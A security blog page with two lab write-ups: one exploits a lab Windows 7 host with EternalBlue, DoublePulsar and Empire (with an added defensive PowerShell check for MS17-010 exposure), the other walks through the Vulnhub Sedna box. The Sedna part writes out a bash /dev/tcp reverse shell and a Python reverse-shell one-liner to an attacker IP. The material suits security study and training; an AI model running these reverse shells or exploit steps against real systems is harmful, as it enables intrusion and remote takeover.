Wednesday, 24 May 2017

Exploiting Windows 7 Machine Using EternalBlue and DoublePulsar

Introduction

This is the demo I created to understand how MS17-010 is exploited on a Windows 7 machine. The demo is based on the paper by Sheila A. Berta; I built my lab environment with a slightly different mix of operating systems.

The tools I am going to use:

- Empire: Post-exploitation PowerShell agent [Kali Linux]
- Eternalblue: Exploit targeting SMBv1 [Windows XP]
- Doublepulsar: A plugin to inject a malicious DLL and get a reverse shell [Windows XP]
- Fuzzbunch: Framework similar to Metasploit, written in Python 2.6 [Windows XP]

Lab Setup

Attacker 1: Kali Linux with Empire tools [192.168.213.149]
Attacker 2: Windows XP Service Pack 3 with Python 2.6 and PyWin32 v2.12 [192.168.213.147]
Target Machine: A Windows 7 box with Service Pack 1 [192.168.213.150]

Tools

Attacker machine 1: Kali Linux with Empire installed; Empire can be cloned from GitHub.
Attacker machine 2: Windows XP with FuzzBunch, which can also be cloned from GitHub. You will need a couple more tools to run FuzzBunch: Python 2.6 and PyWin32 v2.12.


Note: You will have to edit the environment variables to add Python 2.6 to the PATH. How to do this? Here you go.
Target machine: Nothing :)

Code

There are a couple of changes to be made to the exploit framework's fb.py. Comment out line 72, because the corresponding folder is empty inside the leak and it returns errors until the line is commented out.

Another change that needs to be made is in the "Fuzzbunch.xml" file. We have to amend the paths on lines 19 and 24 to match the paths on my XP machine:

C:\Documents and Settings\Administrator\Desktop\shadowbroker-master\shadowbroker-master\windowsResources

C:\Documents and Settings\Administrator\Desktop\shadowbroker-master\shadowbroker-master\windows\logs

Exploitation

EternalBlue


Once everything is set and ready to go, we fire up fb.py on the Windows XP machine using python26.

Fill in the required details: target IP and callback IP (the Kali machine). I used "0" to select my already created project "eternal-test".

Now we choose the exploit "EternalBlue".

We leave most of the exploit settings at their defaults, but select "1" for Target OS (the Windows 7 exploit) and "1" for Mode of delivery to use "FB".

Once everything is set, we execute the exploit. Successful execution is confirmed by the message "Eternalblue Succeeded".

The Empire of Powershell

Once Eternalblue has run successfully, we switch back to the Kali box and use Empire to create a malicious DLL and set up a listener for the agent.

The first step is to set up a listener so that a reverse connection can be established once the malicious DLL is injected using Doublepulsar. We use an HTTP listener with the name "Eternal" (how thoughtful) and put Kali's IP address under Host. Once all parameters are set, we start the listener.

Once the listener is started, we create a malicious DLL using Empire's "Stager" module. We set the architecture to x86, as our target is a 32-bit machine. Executing the stager creates a malicious DLL named "launcher.dll".

Now we start an HTTP server on Kali and download the file to our Windows XP attacker machine.

The Doublepulsar

Now it is time to inject our malicious DLL. Back in FuzzBunch, we use Doublepulsar.

Similar to Eternalblue, we use the default settings, but ensure the following are set accordingly:

Protocol: "0" for SMB
Architecture: "0" for x86 (remember, we are targeting a 32-bit OS)
Function: "2" to execute a DLL
DllPayload: Path where "launcher.dll" is stored on the attacker machine.

Some more default settings that we leave unchanged.

A final check of the module settings, then hit execute.

We know the module ran successfully because we see "Doublepulsar Succeeded". At this point, we should have a connection back to the Kali box.

And... we have the reverse shell. To interact with the newly compromised machine, we just need to type "interact W74MEG9".

Migrating to Meterpreter

Now that we have pwned the box, we migrate our session to Meterpreter. We use the multi/handler with the payload "windows/meterpreter/reverse_http".

In Empire, we use the module "powershell/code_execution/invoke_shellcode" and set the agent to "W74MEG9".

Once executed, we check whether we have received a reverse Meterpreter shell.

There we go! This is as easy to exploit as the SMB NetAPI attack on Windows XP and 2003.
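The lab target is an unpatched Windows 7 SP1 host with SMBv1 reachable, which is exactly the condition a defender wants to rule out. As an added example that is not part of the original post, the following PowerShell reports whether a Windows 7 SP1 / Server 2008 R2 host is exposed in the same way and shows the registry setting that turns the SMBv1 server off. The KB numbers (KB4012212 security-only, KB4012215 monthly rollup) are the MS17-010 updates for that platform and are not on the original page; later monthly rollups also carry the fix, so a missing KB is a prompt to verify against your patch records, not proof.

```powershell
# Added defender-side check (not part of the original post).
# Assumes an elevated PowerShell session on the Windows 7 SP1 / 2008 R2 host being checked.
$Ms17010Kbs = @('KB4012212', 'KB4012215')   # MS17-010 security-only and monthly rollup IDs

function Test-Ms17010Exposure {
    # Look for either MS17-010 package among installed hotfixes. A later cumulative
    # rollup also contains the fix, so treat "not found" as "verify", not "vulnerable".
    $installed = Get-HotFix | Where-Object { $Ms17010Kbs -contains $_.HotFixID }
    $patched   = [bool]$installed

    # The SMBv1 server is enabled on this platform unless the SMB1 value exists and is 0.
    $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $smb1   = (Get-ItemProperty -Path $params -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    $smb1Enabled = ($null -eq $smb1) -or ($smb1 -ne 0)

    [pscustomobject]@{
        ComputerName   = $env:COMPUTERNAME
        Ms17010Patched = $patched
        Smb1Enabled    = $smb1Enabled
        # Exposed in the same way as the lab target: no MS17-010 KB found and SMBv1 still on
        Exposed        = (-not $patched) -and $smb1Enabled
    }
}

function Disable-Smb1Server {
    # Microsoft's documented registry setting for Windows 7 / 2008 R2; takes effect after a reboot.
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' `
        -Name SMB1 -Type DWORD -Value 0 -Force
}

Test-Ms17010Exposure | Format-List
```

Run Disable-Smb1Server only after confirming nothing on the host still depends on SMBv1, then reboot and re-run Test-Ms17010Exposure to confirm Smb1Enabled reports False.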

Tuesday, 23 May 2017

Vulnhub - hackfest2016:Sedna Walkthrough

Enumeration:

To begin with, I ran nmap to identify the services running on the box.

Now we have some information to start with, and the first target will be the HTTP services (80 and 8080). Our best friend Nikto gave us some vital information:

And the HTTP service running on port 8080:

We have some more vital information. Let's concentrate on port 80 first and come back to 8080 later. We have identified that Apache 2.4.7 is running on the box, and the "license.txt" file reveals that BuilderEngine is installed. However, we still don't know which version it is, so let's enumerate a bit more.

Nice! A few more directories, and this time the file "description.txt" revealed that BuilderEngine Version 3 is installed.

Going for the kill - Flag 1

To get a limited shell, we exploit the BuilderEngine Arbitrary File Upload vulnerability to upload a shell. The exploit and PoC can be found here.
To upload a PHP shell (make sure you change the IP and port in the web shell so it connects back to you; I used port 443) we use the POST method as explained in the exploit.
Firing up Firefox and opening the page presents us with a form to upload files; here we upload our shell.
Once the shell is uploaded, we can find it at http://<target ip>/files/.

We start our netcat listener on port 443 and click "php-reverse-shell.php" to execute the web shell.

Bingo! We have the shell. To get the first flag we cd into "/var/www".

Rooting the box - Flag 2

After exhausting the list of kernel exploits on searchsploit for Ubuntu 14.04 and kernel 13.3.0-32, I decided to do more enumeration and found that chkrootkit is installed on the machine. To our luck, version 0.49 is installed.

Searching on searchsploit, we found an exploit for chkrootkit version 0.49. As per the vulnerability, chkrootkit will execute the files with root privileges. We now create a bash script for a reverse shell and wget it into the "tmp" folder:

#! /bin/bash
bash -i >& /dev/tcp/192.168.213.149/445 0>&1

Once the script is ready, we wget it into the "tmp" directory and make it executable.

Now we start the listener on port 445 on our attacker machine and wait for the file to execute and send back the reverse shell.

w00t w00t! We have a root shell. However, there is a small problem: the shell we got has some TTY issues. To tackle this, I start another listener on port 8000 and use a Python one-liner reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.213.149",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

There we go! We have a stable root shell and the 2nd flag.

Post exploitation - Flag 3

For flag 3, I did a bit more enumeration. From the nmap results I know that Tomcat is running on port 8080, and further enumeration revealed that the Tomcat manager's username and password are stored in the file "tomcat-users.xml" in the directory "/etc/tomcat7", which is actually the 3rd flag.

I also enumerated for the 4th flag; to get it I needed to crack a user's password. I tried John as well as brute-forcing the user over SSH, but no luck. I'd be interested to see if someone actually cracked the password.
